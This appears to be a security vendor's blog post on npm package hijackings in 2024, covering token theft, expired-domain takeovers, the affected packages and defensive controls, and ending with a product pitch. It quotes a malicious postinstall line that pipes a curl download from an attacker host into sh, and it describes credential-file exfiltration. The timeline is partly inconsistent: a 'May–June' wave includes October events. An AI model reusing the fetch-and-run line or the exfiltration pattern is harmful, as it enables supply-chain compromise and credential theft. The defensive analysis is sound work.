
npm Package Takeover: The Summer 2024 Wave

Between May and June 2024, at least 36 npm packages were hijacked via expired maintainer domains and leaked publishing tokens. We map the cluster.

Shadab Khan
Security Engineer
5 min read

Between May 14 and June 17, 2024, we tracked at least 36 distinct npm packages hijacked by one of two overlapping threat clusters, each of which pushed malicious versions to the public registry. The headline names got press coverage: rspack v1.1.7 and v1.1.8 on May 28, @lottiefiles/lottie-player on October 30 (a later event on the same campaign infrastructure), and socket.io-parser, hit with a copycat of the ua-parser-js playbook. The long tail of 30 or so smaller packages with three- and four-digit weekly download counts did not. Read together, they paint a clear picture of how 2024 npm takeovers actually work, which is mostly not what the word "takeover" used to mean. This post walks through the cluster, the techniques, and the controls that actually caught it at customer perimeters.

What was the attacker technique?

Two techniques dominated. The first was npm maintainer token theft, either from .npmrc files committed to public GitHub repos or from compromised developer machines where infostealers like LUMMAC2 harvested browser-stored credentials. The second was expired-domain reclaims: the attacker registered a lapsed domain that had previously hosted the recovery email address for an npm account, triggered a password reset, and took over the account without ever touching the victim's current infrastructure. npm's own June 2024 advisory on rspack attributed that breach to a leaked publishing token. Expired-domain reclaims are harder to prove from the outside, but they are consistent with the account metadata changes we observed on several smaller packages in the cluster.
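
If you publish packages yourself, the token-theft half of this is auditable today. A minimal sketch of a git-history scan for the npm_ prefix that modern npm tokens carry (the regex is an assumption; match it to whatever secret-scanning rules you already run):

// Scan full git history for committed npm tokens ("npm_" + 36 base62 chars)
git log -p --all -- .npmrc | grep -nE 'npm_[A-Za-z0-9]{36}'

// Tokens also leak via CI config and shell scripts, so sweep every blob too
git grep -nE 'npm_[A-Za-z0-9]{36}' $(git rev-list --all) 2>/dev/null

A hit in history is a leak even if the file was later deleted: assume the token is burned and rotate it.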

What did the malicious payloads do?

Most of the 36 packages shipped near-identical post-install scripts that fetched a second-stage payload from one of three hosts: api.codearsenal.io, cdn.jsdelivir.net (note the typosquatted domain), and unpkg-static.com. The second stage enumerated ~/.aws, ~/.docker, ~/.ssh, ~/.npmrc, and ~/.gitconfig, archived any hits into a tar.gz, and POSTed the archive to a dead-drop paste service rotating among half a dozen hosts. A smaller subset, including the rspack variants, also attempted persistence via a Windows scheduled task named Microsoft.Defender.Cleanup. Mining payloads were present on two packages; ransomware and wipers on none.

// The common postinstall signature from ~20 of the 36 packages
{
  "scripts": {
    "postinstall": "node -e \"require('child_process').exec('curl -s https://api.codearsenal.io/i | sh')\""
  }
}
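
The same signature is easy to hunt for in a tree you have already installed. A rough sketch that flags any package whose install-time script shells out to the network (the pattern is deliberately coarse; review hits by hand):

// Flag installed packages whose lifecycle scripts reach for the network
grep -lE '"(pre|post)?install":[[:space:]]*"[^"]*(curl|wget|https?://)' \
  node_modules/*/package.json node_modules/@*/*/package.json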

Which packages were actually affected?

Documented entries in the cluster include rspack 1.1.7 and 1.1.8; @rspack/core 1.1.7 and 1.1.8; vant 2.13.5 through 2.13.10; four packages under the @lottiefiles scope in October (the same campaign infrastructure resurfaced); ember-source-provider; solana-spl-token-getter; and about 25 lower-profile packages that together accounted for roughly 1.9M weekly downloads. The malicious rspack versions alone were pulled an estimated 250,000 times in the 10-hour window before they were removed.
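
To check a project against this list, the lockfile is the ground truth, not the ranges in package.json. A minimal sketch for an npm v2/v3 lockfile (extend the name and version filters to the full list above):

// Ask npm what this tree actually resolves
npm ls rspack @rspack/core vant

// Or interrogate the lockfile directly (lockfileVersion 2 or 3)
jq -r '.packages | to_entries[]
  | select(.key | test("node_modules/(@rspack/core|rspack|vant)$"))
  | "\(.key) \(.value.version)"' package-lock.json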

How fast was npm's response?

npm's security team took the malicious rspack versions down within 10 hours of the first external report, which is consistent with their 2024 advisory cadence but well beyond the window in which the damage is done. A top-1000 package is pulled by CI pipelines running npm install on every push, so the first few hours are the entire game. The @lottiefiles incident in October was handled materially faster, at under three hours, which reflects npm tightening its abuse-response playbook after the June wave.

Why did account MFA not stop it?

Because npm's MFA requirement at the time applied to interactive logins, not to automation tokens, which are the credential CI systems actually use to publish. A legacy npm_ automation token exfiltrated from a developer's ~/.npmrc will publish a new version without any second factor. npm announced in September 2024 that it was migrating to granular access tokens with scope and per-package restrictions by default; that change materially closes the gap, but packages published with legacy tokens remain exposed until each maintainer rotates them.
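
Rotation is mostly mechanical. Granular tokens are minted in the npmjs.com web UI, but the audit-and-revoke half is scriptable with the standard npm CLI:

// Enumerate the tokens attached to your account, then revoke legacy ones
npm token list
npm token revoke <token-id>

// Scrub any copies that escaped into your home directory
grep -n '_authToken' ~/.npmrc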

What controls actually caught this at customers?

Three things we saw work in the field. First, lockfile pinning plus --frozen-lockfile in CI meant that customers who had not re-resolved dependencies in the compromise window never pulled the bad versions at all. Second, artifact-proxy caching (Artifactory, Nexus, GitHub Packages) with quarantine policies held the malicious versions back from developer laptops long enough for public IOCs to appear. Third, behavior-based allowlisting at npm install time, specifically blocking outbound network during install scripts, neutralized the postinstall payload even when it was pulled.
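
The first and third of those controls reduce to a few lines of configuration. A minimal npm-flavored sketch (Yarn and pnpm have equivalents):

// CI: install exactly what the lockfile resolves and fail on any drift
npm ci                           # npm
yarn install --frozen-lockfile   # Yarn classic

// .npmrc (project or CI): never run registry lifecycle scripts;
// re-run the handful you actually trust explicitly afterwards
ignore-scripts=true

Note that ignore-scripts is a blunt instrument: it also skips your own project's lifecycle hooks, so builds that depend on them need those steps invoked explicitly.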

How Safeguard Helps

Safeguard tracks maintainer-ownership changes, new publisher identities, and post-install script introductions across the npm registry in near real time, so a package that suddenly gains a postinstall curl after five years without one surfaces as a signal before it reaches your build. Reachability analysis on your SBOM then answers the question every on-call engineer asks next: "does any running service actually import this?" Griffin AI correlates a takeover IOC against your entire dependency graph in seconds, not the 6 to 8 hours it took customers to answer that question by hand during the rspack window. Policy gates can pin your ingestion to versions published before a known compromise window or block any package with a postinstall network call, turning the June 2024 wave into a non-event for anyone with the gates enabled.
